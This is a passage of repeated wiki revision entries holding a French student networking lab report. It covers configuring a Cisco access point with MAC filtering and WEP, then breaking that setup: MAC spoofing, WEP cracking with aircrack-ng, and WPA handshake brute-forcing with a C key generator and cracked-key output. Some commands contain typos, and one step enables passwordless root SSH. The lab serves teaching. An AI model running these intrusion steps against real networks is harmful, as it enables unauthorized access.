	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Crackage de la cle wpa&amp;lt;/h4&amp;gt;&lt;br /&gt;
la particularité de ce crackage est le fait de trouver le handshak :&lt;br /&gt;
Pour cela on commance par la ligne de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng -w out --encrypt wpa -c 11 --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois le handshak est obtenus, on cree un dictionnaire pour le bruteforce sur notre cle wpa, pour cela on cree un petit programme en C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
int cpt = 0;&lt;br /&gt;
for(cpt=0;cpt&amp;lt;99999999;cpt++){&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,cpt);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [00:58:47] 12399908 keys tested (3597.80 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399905 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 10 F5 F9 6D F5 5D 9A D7 66 CE 4D 59 A7 28 E8 FC &lt;br /&gt;
                       AF FD 13 C5 BF 80 CC AB 1E 72 7F 8F 07 36 3E E5 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : FD 23 BE EE 18 CA 1E 70 D5 E8 2A 44 0A B7 08 7C &lt;br /&gt;
                       CD BA E5 A4 5A 34 EE 2F B4 13 2A 20 81 A7 7A 1B &lt;br /&gt;
                       3E 5A E1 14 D6 4D B9 0B FA 71 D1 C7 FF 01 FE F9 &lt;br /&gt;
                       3A 24 2A F3 91 6F C5 AA 5A 93 6D 64 F9 BC 59 68 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : DE 44 15 8A 67 04 2C FD 62 79 93 1F 08 7B 34 D6 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, qhelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l'access root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console Werewolf&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root&lt;br /&gt;
 apt-get install mailx&lt;br /&gt;
 apt-get install bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23094</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23094"/>
				<updated>2015-11-20T10:04:39Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, qhelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l'access root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console Werewolf&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root&lt;br /&gt;
 apt-get install mailx&lt;br /&gt;
 apt-get install bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23085</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23085"/>
				<updated>2015-11-20T08:41:06Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connection série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l'accés au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d'accés afin qu'il autorise l'accés a certaine adresse mac et bloque le reste/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00015.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et ensuite lancé une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, qhelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l'access root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console Werewolf&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23033</id>
